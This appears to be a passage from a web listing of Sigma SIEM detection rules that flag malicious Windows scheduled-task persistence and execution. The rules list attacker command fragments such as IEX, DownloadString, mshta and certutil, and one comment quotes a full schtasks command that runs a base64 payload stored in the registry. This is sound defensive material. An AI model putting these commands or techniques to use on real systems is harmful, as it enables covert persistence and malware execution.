Sigma is the open generic signature format for SIEM systems. Each rule below converts to native syntax for Splunk, Elastic, Sentinel, and other SIEMs. Expand any rule to see its raw YAML.
Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities
status testauthor Nasreddine Bencherchali (Nextron Systems)id 7595ba94-cf3b-4471-aa03-4f6baa9e5fad
view Sigma YAML
title: Important Scheduled Task Deleted/Disabled
id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad
related:
- id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 # ProcCreation schtasks delete
type: similar
- id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980 # ProcCreation schtasks disable
type: similar
- id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d # TaskScheduler EventLog
type: similar
status: test
description: Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities
references:
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4699
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4701
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-05
modified: 2023-03-13
tags:
- attack.execution
- attack.privilege-escalation
- attack.persistence
- attack.t1053.005
logsource:
product: windows
service: security
definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.'
detection:
selection:
EventID:
- 4699 # Task Deleted Event
- 4701 # Task Disabled Event
TaskName|contains:
# Add more important tasks
- '\Windows\SystemRestore\SR'
- '\Windows\Windows Defender\'
- '\Windows\BitLocker'
- '\Windows\WindowsBackup\'
- '\Windows\WindowsUpdate\'
- '\Windows\UpdateOrchestrator\Schedule'
- '\Windows\ExploitGuard'
filter_main_defender_update:
EventID: 4699
SubjectUserName|endswith: '$' # False positives during upgrades of Defender, where its tasks get removed and added
TaskName|contains: '\Windows\Windows Defender\'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
regression_tests_path: regression_data/rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable/info.yml
simulation:
- type: atomic-red-team
name: Windows - Disable the SR scheduled task
technique: T1490
atomic_guid: 1c68c68d-83a4-4981-974e-8993055fa034
high
Persistence and Execution at Scale via GPO Scheduled Task
Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale
status testauthor Samir Bousseadenid a8f29a7b-b137-4446-80a0-b804272f3da2
view Sigma YAML
title: Persistence and Execution at Scale via GPO Scheduled Task
id: a8f29a7b-b137-4446-80a0-b804272f3da2
status: test
description: Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale
references:
- https://twitter.com/menasec1/status/1106899890377052160
- https://www.secureworks.com/blog/ransomware-as-a-distraction
- https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-0-16-1-scheduled-task-execution-at-scale-via-gpo.html
author: Samir Bousseaden
date: 2019-04-03
modified: 2024-09-04
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.lateral-movement
- attack.t1053.005
logsource:
product: windows
service: security
definition: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure'
detection:
selection_5136:
EventID: 5136
AttributeLDAPDisplayName:
- 'gPCMachineExtensionNames'
- 'gPCUserExtensionNames'
AttributeValue|contains:
- 'CAB54552-DEEA-4691-817E-ED4A4D1AFC72'
- 'AADCED64-746C-4633-A97C-D61349046527'
selection_5145:
EventID: 5145
ShareName|endswith: '\SYSVOL' # looking for the string \\*\SYSVOL
RelativeTargetName|endswith: 'ScheduledTasks.xml'
AccessList|contains:
- 'WriteData'
- '%%4417'
condition: 1 of selection_*
falsepositives:
- If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduled tasks.
level: high
high
Potential Persistence Via Powershell Search Order Hijacking - Task
Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
status testauthor pH-T (Nextron Systems), Florian Roth (Nextron Systems)id b66474aa-bd92-4333-a16c-298155b120df
view Sigma YAML
title: Potential Persistence Via Powershell Search Order Hijacking - Task
id: b66474aa-bd92-4333-a16c-298155b120df
related:
- id: 6e8811ee-90ba-441e-8486-5653e68b2299
type: similar
status: test
description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
references:
- https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/
author: pH-T (Nextron Systems), Florian Roth (Nextron Systems)
date: 2022-04-08
modified: 2023-02-03
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
- attack.t1059.001
logsource:
product: windows
category: process_creation
detection:
selection:
ParentImage: 'C:\WINDOWS\System32\svchost.exe'
ParentCommandLine|contains|all:
- '-k netsvcs'
- '-s Schedule'
CommandLine|endswith:
- ' -windowstyle hidden'
- ' -w hidden'
- ' -ep bypass'
- ' -noni'
condition: selection
falsepositives:
- Unknown
level: high
high
Potential Registry Persistence Attempt Via Windows Telemetry
Detects potential persistence behavior using the windows telemetry registry key.
Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
The problem is, it will run any arbitrary command without restriction of location or type.
status testauthor Lednyov Alexey, oscd.community, Sreemanid 73a883d0-0348-4be4-a8d8-51031c2564f8
view Sigma YAML
title: Potential Registry Persistence Attempt Via Windows Telemetry
id: 73a883d0-0348-4be4-a8d8-51031c2564f8
related:
- id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5
type: obsolete
status: test
description: |
Detects potential persistence behavior using the windows telemetry registry key.
Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
The problem is, it will run any arbitrary command without restriction of location or type.
references:
- https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
author: Lednyov Alexey, oscd.community, Sreeman
date: 2020-10-16
modified: 2023-08-17
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
category: registry_set
product: windows
definition: 'Requirements: Sysmon config that monitors \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController subkey of the HKLM hives'
detection:
selection:
TargetObject|contains: '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\'
TargetObject|endswith: '\Command'
Details|contains:
- '.bat'
- '.bin'
- '.cmd'
- '.dat'
- '.dll'
- '.exe'
- '.hta'
- '.jar'
- '.js'
- '.msi'
- '.ps'
- '.sh'
- '.vb'
filter_main_generic:
Details|contains:
- '\system32\CompatTelRunner.exe'
- '\system32\DeviceCensus.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
high
Potential SSH Tunnel Persistence Install Using A Scheduled Task
Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server.
status experimentalauthor Rory Duncanid 2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f
view Sigma YAML
title: Potential SSH Tunnel Persistence Install Using A Scheduled Task
id: 2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f
status: experimental
description: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server.
references:
- https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
- https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection
author: Rory Duncan
date: 2025-07-14
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
- attack.command-and-control
logsource:
product: windows
category: process_creation
detection:
selection_img:
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_cli_sshd:
CommandLine|contains|all:
- ' /create '
- 'sshd.exe'
- '-f'
selection_cli_ssh:
CommandLine|contains|all:
- ' /create '
- 'ssh.exe'
- '-i'
condition: selection_img and 1 of selection_cli_*
falsepositives:
- Unknown
level: high
high
Renamed Schtasks Execution
Detects the execution of renamed schtasks.exe binary, which is a legitimate Windows utility used for scheduling tasks.
One of the very common persistence techniques is schedule malicious tasks using schtasks.exe.
Since, it is heavily abused, it is also heavily monitored by security products. To evade detection, threat actors may rename the schtasks.exe binary to schedule their malicious tasks.
status experimentalauthor Swachchhanda Shrawan Poudel (Nextron Systems)id f91e51c9-f344-4b32-969b-0b6f6b8537d4
view Sigma YAML
title: Renamed Schtasks Execution
id: f91e51c9-f344-4b32-969b-0b6f6b8537d4
status: experimental
description: |
Detects the execution of renamed schtasks.exe binary, which is a legitimate Windows utility used for scheduling tasks.
One of the very common persistence techniques is schedule malicious tasks using schtasks.exe.
Since, it is heavily abused, it is also heavily monitored by security products. To evade detection, threat actors may rename the schtasks.exe binary to schedule their malicious tasks.
references:
- https://x.com/JangPr0/status/1932034543026065833
- https://ss64.com/nt/schtasks.html
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-11-27
tags:
- attack.execution
- attack.persistence
- attack.privilege-escalation
- attack.stealth
- attack.t1036.003
- attack.t1053.005
logsource:
category: process_creation
product: windows
detection:
selection_cmd_operation:
CommandLine|contains|windash:
- ' /create '
- ' /delete '
- ' /query '
- ' /change '
- ' /run '
- ' /end '
selection_cmd_flags:
CommandLine|contains|windash:
- ' /tn '
- ' /tr '
- ' /sc '
- ' /st '
- ' /ru '
- ' /fo '
selection_pe:
OriginalFileName: 'schtasks.exe'
filter_main_cmd:
CommandLine|contains: 'schtasks'
filter_main_img:
Image|endswith: '\schtasks.exe'
condition: (all of selection_cmd_* and not filter_main_cmd) or (selection_pe and not filter_main_img)
falsepositives:
- Unlikely
level: high
high
Scheduled Task Creation Masquerading as System Processes
Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.
status experimentalauthor Swachchhanda Shrawan Poudel (Nextron Systems)id 9f8573c9-22b4-40e3-89c1-72bc2b8d49ab
view Sigma YAML
title: Scheduled Task Creation Masquerading as System Processes
id: 9f8573c9-22b4-40e3-89c1-72bc2b8d49ab
status: experimental
description: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.
references:
- https://tria.ge/241015-l98snsyeje/behavioral2
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-02-05
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.stealth
- attack.t1053.005
- attack.t1036.004
- attack.t1036.005
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_cli:
CommandLine|contains|windash: ' /create '
CommandLine|contains:
- ' audiodg'
- ' conhost'
- ' dwm.exe'
- ' explorer'
- ' lsass'
- ' lsm'
- ' mmc'
- ' msiexec'
- ' regsvr32'
- ' rundll32'
- ' services'
- ' spoolsv'
- ' svchost'
- ' taskeng'
- ' taskhost'
- ' wininit'
- ' winlogon'
condition: all of selection_*
falsepositives:
- Legitimate system administration tasks scheduling trusted system processes.
level: high
high
Scheduled Task Executing Encoded Payload from Registry
Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
title: Scheduled Task Executing Encoded Payload from Registry
id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78
status: test
description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
references:
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-02-12
modified: 2023-02-04
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
- attack.t1059.001
logsource:
product: windows
category: process_creation
detection:
selection_img:
# schtasks.exe /Create /F /TN "{97F2F70B-10D1-4447-A2F3-9B070C86E261}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Pvoeooxf).yzbbvhhdypa))) " /SC MINUTE /MO 30
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_cli_create:
CommandLine|contains: '/Create'
selection_cli_encoding:
CommandLine|contains:
- 'FromBase64String'
- 'encodedcommand'
selection_cli_get:
CommandLine|contains:
- 'Get-ItemProperty'
- ' gp ' # Alias
selection_cli_hive:
CommandLine|contains:
- 'HKCU:'
- 'HKLM:'
- 'registry::'
- 'HKEY_'
condition: all of selection_*
falsepositives:
- Unlikely
level: high
high
Scheduled TaskCache Change by Uncommon Program
Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
status testauthor Syed Hasan (@syedhasan009)id 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d
view Sigma YAML
title: Scheduled TaskCache Change by Uncommon Program
id: 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d
status: test
description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
references:
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
- https://labs.f-secure.com/blog/scheduled-task-tampering/
author: Syed Hasan (@syedhasan009)
date: 2021-06-18
modified: 2025-10-22
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053
- attack.t1053.005
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\'
filter_main_empty:
Details: '(Empty)'
filter_main_null:
Details: null
filter_main_other:
TargetObject|contains:
- 'Microsoft\Windows\UpdateOrchestrator'
- 'Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask\Index'
- 'Microsoft\Windows\Flighting\OneSettings\RefreshCache\Index'
filter_main_mousocoreworker:
Image|endswith: 'C:\Windows\System32\MoUsoCoreWorker.exe'
filter_main_services:
Image|endswith: 'C:\Windows\System32\services.exe'
filter_main_tiworker:
Image|startswith: 'C:\Windows\'
Image|endswith: '\TiWorker.exe'
filter_main_svchost:
Image: 'C:\WINDOWS\system32\svchost.exe'
filter_main_ngen:
Image|startswith: 'C:\Windows\Microsoft.NET\Framework' # \Framework\ and \Framework64\
Image|endswith: '\ngen.exe'
TargetObject|contains:
- '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}'
- '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET Framework\.NET Framework NGEN'
filter_main_office:
Image:
- 'C:\Program Files\Microsoft Office\root\Integration\Integrator.exe'
- 'C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe'
- 'C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe'
- 'C:\Program Files (x86)\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe'
filter_main_msiexec:
Image: 'C:\Windows\System32\msiexec.exe'
filter_main_explorer:
Image: 'C:\Windows\explorer.exe'
TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\PLA\Server Manager Performance Monitor\'
filter_main_system:
Image: 'System'
filter_main_runtimebroker:
Image: 'C:\Windows\System32\RuntimeBroker.exe'
filter_optional_dropbox_updater:
Image:
- 'C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe'
- 'C:\Program Files\Dropbox\Update\DropboxUpdate.exe'
filter_optional_edge:
Image|endswith:
- 'C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe'
- 'C:\Program Files\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe'
filter_optional_onedrive:
Image|endswith:
- 'C:\Program Files (x86)\Microsoft OneDrive\OneDrive.exe'
- 'C:\Program Files\Microsoft OneDrive\OneDrive.exe'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Unknown
level: high
high
Schtasks Creation Or Modification With SYSTEM Privileges
Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
status testauthor Nasreddine Bencherchali (Nextron Systems)id 89ca78fd-b37c-4310-b3d3-81a023f83936
view Sigma YAML
title: Schtasks Creation Or Modification With SYSTEM Privileges
id: 89ca78fd-b37c-4310-b3d3-81a023f83936
status: test
description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
references:
- https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-28
modified: 2025-02-15
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_root:
Image|endswith: '\schtasks.exe'
CommandLine|contains:
- ' /change '
- ' /create '
selection_run:
CommandLine|contains: '/ru '
selection_user:
CommandLine|contains:
- 'NT AUT' # This covers the usual NT AUTHORITY\SYSTEM
- ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space
filter_optional_teamviewer:
# FP from test set in SIGMA
# Cannot use ParentImage on all OSes for 4688 events
# ParentImage|contains|all:
# - '\AppData\Local\Temp\'
# - 'TeamViewer_.exe'
Image|endswith: '\schtasks.exe'
CommandLine|contains|all:
- '/TN TVInstallRestore'
- '\TeamViewer_.exe'
filter_optional_office:
CommandLine|contains|all:
# https://answers.microsoft.com/en-us/msoffice/forum/all/office-15-subscription-heartbeat-task-created-on/43ab5e53-a9fb-47c6-8c14-44889974b9ff
- 'Subscription Heartbeat'
- '\HeartbeatConfig.xml'
- '\Microsoft Shared\OFFICE'
filter_optional_avira:
CommandLine|contains:
- '/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR '
- ':\Program Files (x86)\Avira\System Speedup\setup\avira_speedup_setup.exe'
- '/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART" /RL HIGHEST'
condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
- Unknown
level: high
high
Schtasks From Suspicious Folders
Detects scheduled task creations that have suspicious action command and folder combinations
status testauthor Florian Roth (Nextron Systems)id 8a8379b8-780b-4dbf-b1e9-31c8d112fefb
Suspicious Command Patterns In Scheduled Task Creation
Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
status testauthor Florian Roth (Nextron Systems)id f2c64357-b1d2-41b7-849f-34d2682c0fad
view Sigma YAML
title: Suspicious Command Patterns In Scheduled Task Creation
id: f2c64357-b1d2-41b7-849f-34d2682c0fad
status: test
description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
references:
- https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/
- https://twitter.com/RedDrip7/status/1506480588827467785
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf
author: Florian Roth (Nextron Systems)
date: 2022-02-23
modified: 2024-03-19
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_schtasks:
Image|endswith: '\schtasks.exe'
CommandLine|contains: '/Create '
selection_pattern_1:
CommandLine|contains:
- '/sc minute '
- '/ru system '
selection_pattern_2:
CommandLine|contains:
- 'cmd /c'
- 'cmd /k'
- 'cmd /r'
- 'cmd.exe /c '
- 'cmd.exe /k '
- 'cmd.exe /r '
selection_uncommon:
CommandLine|contains:
- ' -decode '
- ' -enc '
- ' -w hidden '
- ' bypass '
- ' IEX'
- '.DownloadData'
- '.DownloadFile'
- '.DownloadString'
- '/c start /min ' # https://twitter.com/RedDrip7/status/1506480588827467785
- 'FromBase64String'
- 'mshta http'
- 'mshta.exe http'
selection_anomaly_1:
CommandLine|contains:
- ':\ProgramData\'
- ':\Temp\'
- ':\Tmp\'
- ':\Users\Public\'
- ':\Windows\Temp\'
- '\AppData\'
- '%AppData%'
- '%Temp%'
- '%tmp%'
selection_anomaly_2:
CommandLine|contains:
- 'cscript'
- 'curl'
- 'wscript'
condition: selection_schtasks and ( all of selection_pattern_* or selection_uncommon or all of selection_anomaly_* )
falsepositives:
- Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives
level: high
high
Suspicious Modification Of Scheduled Tasks
Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location
Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on
Instead they modify the task after creation to include their malicious payload
status testauthor Nasreddine Bencherchali (Nextron Systems)id 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b
view Sigma YAML
title: Suspicious Modification Of Scheduled Tasks
id: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b
related:
- id: 614cf376-6651-47c4-9dcc-6b9527f749f4 # Security-Audting Eventlog
type: similar
status: test
description: |
Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location
Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on
Instead they modify the task after creation to include their malicious payload
references:
- Internal Research
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-28
modified: 2022-11-18
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_schtasks:
Image|endswith: '\schtasks.exe'
CommandLine|contains|all:
- ' /Change '
- ' /TN '
selection_susp_locations:
CommandLine|contains:
- '\AppData\Local\Temp'
- '\AppData\Roaming\'
- '\Users\Public\'
- '\WINDOWS\Temp\'
- '\Desktop\'
- '\Downloads\'
- '\Temporary Internet'
- 'C:\ProgramData\'
- 'C:\Perflogs\'
- '%ProgramData%'
- '%appdata%'
- '%comspec%'
- '%localappdata%'
selection_susp_images:
CommandLine|contains:
- 'regsvr32'
- 'rundll32'
- 'cmd /c '
- 'cmd /k '
- 'cmd /r '
- 'cmd.exe /c '
- 'cmd.exe /k '
- 'cmd.exe /r '
- 'powershell'
- 'mshta'
- 'wscript'
- 'cscript'
- 'certutil'
- 'bitsadmin'
- 'bash.exe'
- 'bash '
- 'scrcons'
- 'wmic '
- 'wmic.exe'
- 'forfiles'
- 'scriptrunner'
- 'hh.exe'
- 'hh '
condition: all of selection_*
falsepositives:
- Unknown
level: high
high
Suspicious Scheduled Task Creation
Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.
status testauthor Nasreddine Bencherchali (Nextron Systems)id 3a734d25-df5c-4b99-8034-af1ddb5883a4
view Sigma YAML
title: Suspicious Scheduled Task Creation
id: 3a734d25-df5c-4b99-8034-af1ddb5883a4
status: test
description: Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.
references:
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-05
modified: 2022-12-07
tags:
- attack.execution
- attack.privilege-escalation
- attack.persistence
- attack.t1053.005
logsource:
product: windows
service: security
definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.'
detection:
selection_eid:
EventID: 4698
selection_paths:
TaskContent|contains:
- '\AppData\Local\Temp\'
- '\AppData\Roaming\'
- '\Users\Public\'
- '\WINDOWS\Temp\'
- 'C:\Temp\'
- '\Desktop\'
- '\Downloads\'
- '\Temporary Internet'
- 'C:\ProgramData\'
- 'C:\Perflogs\'
selection_commands:
TaskContent|contains:
- 'regsvr32'
- 'rundll32'
- 'cmd.exe</Command>'
- 'cmd</Command>'
- '<Arguments>/c '
- '<Arguments>/k '
- '<Arguments>/r '
- 'powershell'
- 'pwsh'
- 'mshta'
- 'wscript'
- 'cscript'
- 'certutil'
- 'bitsadmin'
- 'bash.exe'
- 'bash '
- 'scrcons'
- 'wmic '
- 'wmic.exe'
- 'forfiles'
- 'scriptrunner'
- 'hh.exe'
condition: all of selection_*
falsepositives:
- Unknown
level: high
Detects the creation of scheduled tasks that involves a temporary folder and runs only once
status testauthor Florian Roth (Nextron Systems)id 39019a4e-317f-4ce3-ae63-309a8c6b53c5
view Sigma YAML
title: Suspicious Scheduled Task Creation Involving Temp Folder
id: 39019a4e-317f-4ce3-ae63-309a8c6b53c5
status: test
description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
references:
- https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
author: Florian Roth (Nextron Systems)
date: 2021-03-11
modified: 2022-10-09
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\schtasks.exe'
CommandLine|contains|all:
- ' /create '
- ' /sc once '
- '\Temp\'
condition: selection
falsepositives:
- Administrative activity
- Software installation
level: high
high
Suspicious Scheduled Task Update
Detects update to a scheduled task event that contain suspicious keywords.
status testauthor Nasreddine Bencherchali (Nextron Systems)id 614cf376-6651-47c4-9dcc-6b9527f749f4
view Sigma YAML
title: Suspicious Scheduled Task Update
id: 614cf376-6651-47c4-9dcc-6b9527f749f4
related:
- id: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b # ProcCreation schtasks change
type: similar
status: test
description: Detects update to a scheduled task event that contain suspicious keywords.
references:
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-05
tags:
- attack.execution
- attack.privilege-escalation
- attack.persistence
- attack.t1053.005
logsource:
product: windows
service: security
definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.'
detection:
selection_eid:
EventID: 4702
selection_paths:
TaskContentNew|contains:
- '\AppData\Local\Temp\'
- '\AppData\Roaming\'
- '\Users\Public\'
- '\WINDOWS\Temp\'
- 'C:\Temp\'
- '\Desktop\'
- '\Downloads\'
- '\Temporary Internet'
- 'C:\ProgramData\'
- 'C:\Perflogs\'
selection_commands:
TaskContentNew|contains:
- 'regsvr32'
- 'rundll32'
- 'cmd.exe</Command>'
- 'cmd</Command>'
- '<Arguments>/c '
- '<Arguments>/k '
- '<Arguments>/r '
- 'powershell'
- 'pwsh'
- 'mshta'
- 'wscript'
- 'cscript'
- 'certutil'
- 'bitsadmin'
- 'bash.exe'
- 'bash '
- 'scrcons'
- 'wmic '
- 'wmic.exe'
- 'forfiles'
- 'scriptrunner'
- 'hh.exe'
condition: all of selection_*
falsepositives:
- Unknown
level: high
high
Suspicious Schtasks Execution AppData Folder
Detects the creation of a schtask that executes a file from C:\Users\<USER>\AppData\Local
status testauthor pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)id c5c00f49-b3f9-45a6-997e-cfdecc6e1967
view Sigma YAML
title: Suspicious Schtasks Execution AppData Folder
id: c5c00f49-b3f9-45a6-997e-cfdecc6e1967
status: test
description: 'Detects the creation of a schtask that executes a file from C:\Users\<USER>\AppData\Local'
references:
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-03-15
modified: 2022-07-28
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
- attack.t1059.001
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\schtasks.exe'
CommandLine|contains|all:
- '/Create'
- '/RU'
- '/TR'
- 'C:\Users\'
- '\AppData\Local\'
CommandLine|contains:
- 'NT AUT' # This covers the usual NT AUTHORITY\SYSTEM
- ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space
filter:
# FP from test set in SIGMA
ParentImage|contains|all:
- '\AppData\Local\Temp\'
- 'TeamViewer_.exe'
Image|endswith: '\schtasks.exe'
CommandLine|contains: '/TN TVInstallRestore'
condition: selection and not filter
falsepositives:
- Unknown
level: high
high
Suspicious Schtasks Schedule Types
Detects scheduled task creations or modification on a suspicious schedule type
status testauthor Nasreddine Bencherchali (Nextron Systems)id 24c8392b-aa3c-46b7-a545-43f71657fe98
view Sigma YAML
title: Suspicious Schtasks Schedule Types
id: 24c8392b-aa3c-46b7-a545-43f71657fe98
related:
- id: 7a02e22e-b885-4404-b38b-1ddc7e65258a
type: similar
status: test
description: Detects scheduled task creations or modification on a suspicious schedule type
references:
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
- http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-09
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_img:
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_time:
CommandLine|contains:
- ' ONLOGON '
- ' ONSTART '
- ' ONCE '
- ' ONIDLE '
filter_privs:
CommandLine|contains:
- 'NT AUT' # This covers the usual NT AUTHORITY\SYSTEM
